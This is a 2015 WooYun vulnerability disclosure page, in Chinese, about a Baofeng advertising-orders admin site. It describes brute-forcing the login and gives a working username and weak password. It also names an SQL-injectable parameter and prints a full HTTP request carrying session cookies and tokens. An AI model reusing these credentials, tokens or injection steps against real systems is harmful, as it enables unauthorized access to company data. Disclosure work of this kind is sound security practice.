当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127019

漏洞标题:暴风影音某站爆破入后台+SQL注入

相关厂商:暴风影音

漏洞作者: null_z

提交时间:2015-07-15 21:52

修复时间:2015-08-30 15:32

公开时间:2015-08-30 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-15: 细节已通知厂商并且等待厂商处理中
2015-07-16: 厂商已经确认,细节仅向厂商公开
2015-07-26: 细节向核心白帽子及相关领域专家公开
2015-08-05: 细节向普通白帽子公开
2015-08-15: 细节向实习白帽子公开
2015-08-30: 细节向公众公开

简要描述:

暴风影音真棒,重视安全。
今天打电话说送礼物,那就再帮你们检测一下把~~~

详细说明:

首先这个地址可以爆破。http://adorders.huiyan.baofeng.com/
验证码不失效,导入top500姓名和top10密码。
帐号wangpeng
密码 123456
这人是个销售总监
这儿就已经泄漏很多供应商信息。如图

2015-07-15 20:53:09的屏幕截图.png

2015-07-15 20:53:25的屏幕截图.png


然后这儿可以SQL注入
注入参数real_name

GET /Acl/user/list?real_name=&is_delete=0&role_id=0 HTTP/1.1
Host: adorders.huiyan.baofeng.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36
Referer: http://adorders.huiyan.baofeng.com/Acl/user/list?real_name=&is_delete=1&role_id=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4
Cookie: bfuid=135601920076674909; bfuname=1341_9018_4; bfcsid=CUNFhCvV3Fn7o_Pq2kyM1Q%3D%3D; SSOStatus=1439523232; st=8WpHKKvbFsmwHXTB7pR-aiF6I5v6XQLfuLRIgr3_vi33v3S3Hk1ejLSeu2n5l0ery0jn8KfoSMabvPTWvXo6I5D4YIXdtqL9GuOU02YNmjqY5epCXqG0XY8R2iLof2mR; loginToken=GNYDm443uDZuyyxd9f0Aim38mEwh0N7mydSSRv7VHznV_GgFP1dMb90AvEkamaeBXlf-F8PNPpXxErHoAieYDmxVoaPv88j0h4HugQAXShovPmrPxCPxTr4UzvIm0n3TcIbUJWqCZkMJb065AtjE0-AYw1bGK9YRLkYAisnbctUWWAqrIBalyKVr0_CKJ-8UT1LEOmK0W4hYzvyme854MUKzZ1KSSfrJMkM9lTO-KkqyOAaaJ9bNJMwM3SJHeP_eYA2mX6pkM4vnSnG7I_IpAKyKqAvLBTE82Ig6uw1Ua4SaovMLmx_BoCuZX2Nb0QB0; bfsid=50bac3b32aa211e594eae83935af1128; vipssl_ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229e5ef996d986af286db344c06582435f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22117.151.114.114%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A103%3A%22Mozilla%2F5.0+%28X11%3B+Linux+i686%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F37.0.2062.120+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1436964025%3B%7D3292b4aa1811dc5c69ff07a128d68db0; PHPSESSID=f6eoeiirhtr0gpflfn33k1ep65; updateinforandomstr=bb4102d4c1ca16c6ea4b2c79f3c3b611; bf_sid=135601920076674909; bf_user_name=1341_9018_4; bf_sid_check=135601920076674909; umail=1341_9018_4%7C553664196%40qq.com; bali=22; uid=e3f5d5d5fd04ba347a7ae7869b2595547c7fba70; viinfo=Eqw-DERmIzQz3sd1WJFAJQ9xguIuoDHZQQxQP09EgsQJm_ZS3TmQByufKAbRD-2fpRrVzCjP-CSyxs-xk8detw; __utmt=1; __utma=131384592.545561278.1436764443.1436947928.1436964454.3; __utmb=131384592.1.10.1436964454; __utmc=131384592; __utmz=131384592.1436964454.3.3.utmcsr=fofa.so|utmccn=(referral)|utmcmd=referral|utmcct=/lab/ips; bfCollects=; _ga=GA1.2.545561278.1436764443; Hm_lvt_034253c5988f5d0fef5c2eaeff95573c=1436964431,1436964566,1436964568,1436964575; Hm_lpvt_034253c5988f5d0fef5c2eaeff95573c=1436964575; selected-tab=1


2015-07-15 20:59:01的屏幕截图.png

2015-07-15 20:59:10的屏幕截图.png

漏洞证明:

2015-07-15 20:59:01的屏幕截图.png

2015-07-15 20:59:10的屏幕截图.png

修复方案:

加入防爆破机制。另外即使是后台也要防止注入

版权声明:转载请注明来源 null_z@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-07-16 15:31

厂商回复:

感谢您提交的漏洞,我们会尽快修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-15 22:21 | 小菜鸟入门 ( 路人 | Rank:19 漏洞数:9 | 初来驾到多多包涵)

    什么礼物?

  2. 2015-07-15 23:27 | null_z ( 普通白帽子 | Rank:251 漏洞数:30 )

    @小菜鸟入门 还没收到,小礼物没啥期待。厂商态度不错

  3. 2015-07-16 18:07 | 风格 ( 路人 | Rank:18 漏洞数:6 | 注册为白帽子,你可以在这里提交你发现的漏...)

    给礼物其实是想让洞主轻点搞

  4. 2015-07-23 00:08 | 夏七夕 ( 路人 | Rank:2 漏洞数:1 )

    同上。